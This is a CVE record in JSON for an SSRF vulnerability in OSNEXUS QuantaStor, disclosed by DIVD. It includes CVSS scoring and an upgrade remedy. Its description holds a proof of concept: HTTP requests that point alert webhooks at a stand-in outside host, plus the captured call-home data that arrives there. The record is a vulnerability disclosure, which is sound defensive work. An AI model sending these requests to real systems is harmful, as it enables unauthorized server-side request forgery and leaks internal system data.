{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:22:00.000Z", "orgId": "00000000-0000-4000-9000-000000000000", "shortName": "CVE" }, "references": [ { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://www.wbsec.nl/osnexus" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://www.divd.nl/DIVD-2021-00020" }, { "tags": [ "product", "x_transferred" ], "url": "https://www.osnexus.com/products/software-defined-storage" }, { "tags": [ "third-party-advisory", "x_transferred" ], "url": "https://csirt.divd.nl/CVE-2021-42079" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2021-42079", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-11-04T20:06:08.530050Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-11-04T20:06:00.000Z", "orgId": "00000000-0000-4000-9000-000000000000", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "collectionURL": "https://www.osnexus.com/downloads", "defaultStatus": "unknown", "platforms": [ "Windows", "Linux" ], "product": "QuantaStor", "vendor": "OSNEXUS", "versions": [ { "lessThan": "6.0.0.355", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "type": "finder", "value": "Wietse Boonstra (DIVD)" }, { "lang": "en", "type": "analyst", "value": "Frank Breedijk (DIVD)" }, { "lang": "en", "type": "analyst", "value": "Victor Pasman (DIVD)" }, { "lang": "en", "type": "analyst", "value": "Victor Gevers (DIVD)" }, { "lang": "en", "type": "analyst", "value": "Max van der Horst (DIVD)" }, { "lang": "en", "type": "analyst", "value": "Célistine Oosting (DIVD)" } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.

POC

Step 1: Prepare the SSRF with a request like this:

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET>
HTTP/1.1\n
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate\n
Accept: */*\nAccept-Language: en\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
\nConnection: close\n
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json\n
Content-Length: 0

Step 2: Trigger this alert with this request

GET /qstorapi/alertRaise?title=test&message=test&severity=1
HTTP/1.1\n
Host: <HOSTNAME>
Accept-Encoding: gzip, deflate\n
Accept: */*\n
Accept-Language: en\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n
Connection: close\n
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json\n
Content-Length: 1

The post request received by <TARGET> looks like this:
{
 \n### Python FLASK stuff ####\n
 'endpoint': 'index',
 \n'method': 'POST',
 \n'cookies': ImmutableMultiDict([]),
 \n### END Python FLASK stuff ####\n
 \n'data': b'{
  \"attachments\": [
   {\n
    \"fallback\": \"[122] test / test.\",\n
    \"color\": \"#aa2222\",\n
    \"title\": \"[122] test\",\n
    \"text\": \"test\",\n
    \"fields\": [  
     {    \n
      \"title\": \"Alert Severity\",\n    
      \"value\": \"CRITICAL\",\n    
      \"short\": false  
     },  {  
      \"title\": \"Appliance\",    
      \"value\": \"quantastor (https://<HOSTNAME>)\",\n    
      \"short\": true  \n
     },  {    \n
      \"title\": \"System / Driver / Kernel Ver\",    \n
      \"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\",    \n
      \"short\": false  \n
     },  {    \n
      \"title\": \"System Startup\",    \n
      \"value\": \"Fri Aug  6 16-02-55 2021\",    \n
      \"short\": true  \n
      },  {    \n
      \"title\": \"SSID\",    \n
      \"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\",    \n
      \"short\": true  \n
     },
    ],\n
    \"footer\": \"QuantaStor Call-home Alert\",\n
    \"footer_icon\": \"https://platform.slack-edge.com/img/default_application_icon.png\",\n
    \"ts\": 1628461774
   }
  ],
  \"mrkdwn\":true
 }',
 #### FLASK REQUEST STUFF #####\n
 'headers': {\n
  'Host': '<redacted>',
  'User-Agent': 'curl/7.58.0',
  'Accept': '*/*',
  'Content-Type': 'application/json',
  'Content-Length': '790'\n
 },
 'args': ImmutableMultiDict([]),
 'form': ImmutableMultiDict([]),
 'remote_addr': '217.103.63.173',
 'path': '/payload/58',
 'whois_ip': 'TNF-AS, NL'
}\n
#### END FLASK REQUEST STUFF #####" } ], "value": "An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\n\nPOC\n\nStep 1: Prepare the SSRF with a request like this:\n\nGET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://\nHTTP/1.1\n\nHost: \nAccept-Encoding: gzip, deflate\n\nAccept: */*\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \nContent-Type: application/json\n\nContent-Length: 0\n\nStep 2: Trigger this alert with this request\n\nGET /qstorapi/alertRaise?title=test&message=test&severity=1 \nHTTP/1.1\n\nHost: \nAccept-Encoding: gzip, deflate\n\nAccept: */*\n\nAccept-Language: en\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\n\nConnection: close\n\nauthorization: Basic \nContent-Type: application/json\n\nContent-Length: 1\n\nThe post request received by looks like this:\n{\n \n### Python FLASK stuff ####\n\n 'endpoint': 'index', \n \n'method': 'POST', \n \n'cookies': ImmutableMultiDict([]), \n \n### END Python FLASK stuff ####\n\n \n'data': b'{ \n  \"attachments\": [ \n   {\n\n    \"fallback\": \"[122] test / test.\",\n\n    \"color\": \"#aa2222\",\n\n    \"title\": \"[122] test\",\n\n    \"text\": \"test\",\n\n    \"fields\": [   \n     {    \n\n      \"title\": \"Alert Severity\",\n    \n      \"value\": \"CRITICAL\",\n    \n      \"short\": false  \n     },  {   \n      \"title\": \"Appliance\",     \n      \"value\": \"quantastor (https://)\",\n     \n      \"short\": true  \n\n     },  {    \n\n      \"title\": \"System / Driver / Kernel Ver\",    \n\n      \"value\": \"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\",    \n\n      \"short\": false  \n\n     },  {    \n\n      \"title\": \"System Startup\",    \n\n      \"value\": \"Fri Aug  6 16-02-55 2021\",    \n\n      \"short\": true  \n\n      },  {    \n\n      \"title\": \"SSID\",    \n\n      \"value\": \"f4823762-1dd1-1333-47a0-6238c474a7e7\",    \n\n      \"short\": true  \n\n     },\n    ],\n\n    \"footer\": \"QuantaStor Call-home Alert\",\n\n    \"footer_icon\": \" https://platform.slack-edge.com/img/default_application_icon.png \",\n\n    \"ts\": 1628461774\n   }\n  ], \n  \"mrkdwn\":true \n }', \n #### FLASK REQUEST STUFF #####\n\n 'headers': {\n\n  'Host': '', \n  'User-Agent': 'curl/7.58.0', \n  'Accept': '*/*', \n  'Content-Type': 'application/json', \n  'Content-Length': '790'\n\n }, \n 'args': ImmutableMultiDict([]), \n 'form': ImmutableMultiDict([]), \n 'remote_addr': '217.103.63.173', \n 'path': '/payload/58', \n 'whois_ip': 'TNF-AS, NL'\n}\n\n#### END FLASK REQUEST STUFF #####" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-918", "description": "CWE-918 Server-Side Request Forgery (SSRF)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2025-03-11T13:40:00.000Z", "orgId": "00000000-0000-4000-9000-000000000000", "shortName": "DIVD" }, "references": [ { "tags": [ "third-party-advisory", "technical-description" ], "url": "https://www.wbsec.nl/osnexus" }, { "tags": [ "third-party-advisory", "exploit", "technical-description" ], "url": "https://cisrt.divd.nl/DIVD-2021-00020/" }, { "tags": [ "product" ], "url": "https://www.osnexus.com/products/software-defined-storage" }, { "tags": [ "third-party-advisory" ], "url": "https://csirt.divd.nl/CVE-2021-42079" } ], "solutions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Upgrade to the latest version of OSNEXUS QuantaStor." } ], "value": "Upgrade to the latest version of OSNEXUS QuantaStor." } ], "source": { "discovery": "INTERNAL" }, "title": "SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "00000000-0000-4000-9000-000000000000", "assignerShortName": "DIVD", "cveId": "CVE-2021-42079", "datePublished": "2023-07-10T06:29:00.000Z", "dateReserved": "2021-10-07T17:12:00.000Z", "dateUpdated": "2025-03-11T13:40:00.000Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }